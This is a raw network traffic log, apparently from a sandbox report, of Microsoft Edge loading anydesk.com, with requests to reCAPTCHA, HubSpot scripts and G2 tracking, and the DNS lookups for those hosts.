accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=yxyzxcqefvk

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=yxyzxcqefvk HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=xelbucohh9ws

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=xelbucohh9ws HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=1sppy93msb7l

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=1sppy93msb7l HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

msedge.exe

Remote address:

172.217.169.67:443

Request

GET /recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0 HTTP/2.0
host: www.recaptcha.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://js.hs-scripts.com/7940397.js

msedge.exe

Remote address:

104.16.139.209:443

Request

GET /7940397.js HTTP/2.0
host: js.hs-scripts.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: application/javascript;charset=utf-8
cf-bgj: minify
cf-polished: origSize=1949
access-control-allow-credentials: true
access-control-allow-origin: https://support.anydesk.com
access-control-max-age: 3600
vary: origin, Accept-Encoding
x-content-type-options: nosniff
x-hubspot-correlation-id: 31018b52-bea3-49fb-ab03-d245dcb91395
last-modified: Sat, 05 Oct 2024 16:06:45 GMT
cf-cache-status: HIT
age: 14
expires: Sat, 05 Oct 2024 16:09:18 GMT
cache-control: public, max-age=90
server: cloudflare
cf-ray: 8cdeaaad7c765c4d-AMS
content-encoding: br
DNS

tracking.g2crowd.com

msedge.exe

Remote address:

8.8.8.8:53

Request

tracking.g2crowd.com

IN A

Response

tracking.g2crowd.com

IN A

104.18.30.176

tracking.g2crowd.com

IN A

104.18.31.176
DNS

tracking.g2crowd.com

msedge.exe

Remote address:

8.8.8.8:53

Request

tracking.g2crowd.com

IN A

Response

tracking.g2crowd.com

IN A

104.18.31.176

tracking.g2crowd.com

IN A

104.18.30.176
GET

https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en&e=

msedge.exe

Remote address:

104.18.30.176:443

Request

GET /attribution_tracking/conversions/2446.js?p=https://anydesk.com/en&e= HTTP/2.0
host: tracking.g2crowd.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: text/html; charset=UTF-8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: OSVTckz1NS6xSVw7hxoroNsI6j7xVRo75T6xuRMDK+UcavTe4+f3AUFmfIQRrayHmJ1kUb/ynyuMV0Ln2KPzfNtgMh2aT0UCNIRN8buDA/4r0G9eiGvX0hsRwXJvgAorpECXY4l/+55XFI1g4AbsiQ==$jX+VaRI6qK023if+mi2fVg==
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Thu, 01 Jan 1970 00:00:01 GMT
set-cookie: __cf_bm=ZrnDJOq6aPeEMnD7wCIhd4BLyiHe1zgP50W3VAJY1iE-1728144468-1.0.1.1-6tocgGTi_ovUnvI.mxNtsXLkXM3tE2y0pvAT1NHMSxqfSXdus0FvJ5DI4glzoQYbjGCLmRcW28JX.vyNKI4uog; path=/; expires=Sat, 05-Oct-24 16:37:48 GMT; domain=.g2crowd.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdeaab178b766d6-AMS
content-encoding: br
GET

https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e=

msedge.exe

Remote address:

104.18.30.176:443

Request

GET /attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e= HTTP/2.0
host: tracking.g2crowd.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=ZrnDJOq6aPeEMnD7wCIhd4BLyiHe1zgP50W3VAJY1iE-1728144468-1.0.1.1-6tocgGTi_ovUnvI.mxNtsXLkXM3tE2y0pvAT1NHMSxqfSXdus0FvJ5DI4glzoQYbjGCLmRcW28JX.vyNKI4uog

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:08:09 GMT
content-type: text/html; charset=UTF-8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: VbMq2ykxJfbtBDUWX3rXRDBdc0JnknEgLxkA9WPmfuSHIEi9VP8DLFm6sOhiw98/Q9Pzu3QOAAtG6WOskemibDIac2355NXZGauuwRlvL571u/eKqUNfu4Z0uWHcFtZa8PXPotn++PT8A1bz3O3q2A==$EGgtXyiosU6x6/AiZr+feQ==
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Thu, 01 Jan 1970 00:00:01 GMT
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdeab366c8166d6-AMS
content-encoding: br
GET

https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e=

msedge.exe

Remote address:

104.18.30.176:443

Request

GET /attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e= HTTP/2.0
host: tracking.g2crowd.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=ZrnDJOq6aPeEMnD7wCIhd4BLyiHe1zgP50W3VAJY1iE-1728144468-1.0.1.1-6tocgGTi_ovUnvI.mxNtsXLkXM3tE2y0pvAT1NHMSxqfSXdus0FvJ5DI4glzoQYbjGCLmRcW28JX.vyNKI4uog

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: text/html; charset=UTF-8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: qbXx0tlvx+hjegw50b7BNn4reYsB4qqyk/6WEb/JwnetI6OYU7EnBN0FJOumL2WioieWsDLxs93W+8seBWMSBGc3zqL+NK60rVYaQerxtYJe+WcCZRbfTu6GDjkzBjUqLlZV8jpKlQMhjlsTtc61uQ==$5waF18OhzdPIVrdz+GUSWA==
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Thu, 01 Jan 1970 00:00:01 GMT
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdeab5e09c566d6-AMS
content-encoding: br
GET

https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e=

msedge.exe

Remote address:

104.18.30.176:443

Request

GET /attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e= HTTP/2.0
host: tracking.g2crowd.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=ZrnDJOq6aPeEMnD7wCIhd4BLyiHe1zgP50W3VAJY1iE-1728144468-1.0.1.1-6tocgGTi_ovUnvI.mxNtsXLkXM3tE2y0pvAT1NHMSxqfSXdus0FvJ5DI4glzoQYbjGCLmRcW28JX.vyNKI4uog

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: text/html; charset=UTF-8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: CWu43Kg2L45TZxxrZPxpll/C2FNulUesot9moW8PSoA10Nh1ENsxyy8CZKKSfprwn5K7kX967NmuqdOTx9hxwsNV5gEBOuKjRyDGzcfia+/8tJn2fJDvBWzmgwZKA7lMwe+w/jTJFP1qUgYiBSbqvg==$+Mi5mKqtLyOgEFLsvjrdPw==
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Thu, 01 Jan 1970 00:00:01 GMT
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdeab67fc8d66d6-AMS
content-encoding: br
GET

https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/thank-you?dv=win_exe&e=

msedge.exe

Remote address:

104.18.30.176:443

Request

GET /attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/thank-you?dv=win_exe&e= HTTP/2.0
host: tracking.g2crowd.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=ZrnDJOq6aPeEMnD7wCIhd4BLyiHe1zgP50W3VAJY1iE-1728144468-1.0.1.1-6tocgGTi_ovUnvI.mxNtsXLkXM3tE2y0pvAT1NHMSxqfSXdus0FvJ5DI4glzoQYbjGCLmRcW28JX.vyNKI4uog

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:08:30 GMT
content-type: text/html; charset=UTF-8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: DZX8MD+LzPyQ0G1xQNuJHaQQT+oxtuP4WX6oYUiLv8ed6G0pEil0alrHUzCPl05erP3AFV8Omy3Tpcr3w0TUy/NNjjiTtG1V4nwSj6YUWFBpKcDhR2JRrwK6ARoo+I3LFnkKEd8VCzm2KoKSfvINJw==$S/hllG2nrsnNxgfVsaPAYw==
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Thu, 01 Jan 1970 00:00:01 GMT
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdeabb95dbc66d6-AMS
content-encoding: br
DNS

js.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hubspot.com

IN A

Response

js.hubspot.com

IN A

104.16.117.116

js.hubspot.com

IN A

104.16.118.116
DNS

js.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hubspot.com

IN A

Response

js.hubspot.com

IN A

104.16.118.116

js.hubspot.com

IN A

104.16.117.116
DNS

js.usemessages.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.usemessages.com

IN A

Response

js.usemessages.com

IN A

104.16.78.142

js.usemessages.com

IN A

104.16.76.142

js.usemessages.com

IN A

104.16.75.142

js.usemessages.com

IN A

104.16.79.142

js.usemessages.com

IN A

104.16.77.142
DNS

js.usemessages.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.usemessages.com

IN A

Response

js.usemessages.com

IN A

104.16.79.142

js.usemessages.com

IN A

104.16.76.142

js.usemessages.com

IN A

104.16.75.142

js.usemessages.com

IN A

104.16.77.142

js.usemessages.com

IN A

104.16.78.142
DNS

js.hs-analytics.net

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hs-analytics.net

IN A

Response

js.hs-analytics.net

IN A

104.16.160.168

js.hs-analytics.net

IN A

104.17.175.201
DNS

js.hs-analytics.net

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hs-analytics.net

IN A

Response

js.hs-analytics.net

IN A

104.16.160.168

js.hs-analytics.net

IN A

104.17.175.201
DNS

171.224.235.167.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.224.235.167.in-addr.arpa

IN PTR

Response

171.224.235.167.in-addr.arpa

IN PTR

static171224235167clientsyour-serverde
DNS

171.224.235.167.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.224.235.167.in-addr.arpa

IN PTR

Response

171.224.235.167.in-addr.arpa

IN PTR

static171224235167clientsyour-serverde
DNS

67.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.169.217.172.in-addr.arpa

IN PTR

Response

67.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f31e100net
DNS

67.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.169.217.172.in-addr.arpa

IN PTR

Response

67.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f31e100net
DNS

209.139.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.139.16.104.in-addr.arpa

IN PTR

Response
DNS

209.139.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.139.16.104.in-addr.arpa

IN PTR

Response
DNS

176.30.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

176.30.18.104.in-addr.arpa

IN PTR

Response
DNS

176.30.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

176.30.18.104.in-addr.arpa

IN PTR

Response
GET

https://js.hubspot.com/web-interactives-embed.js

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives-embed.js HTTP/2.0
host: js.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://anydesk.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

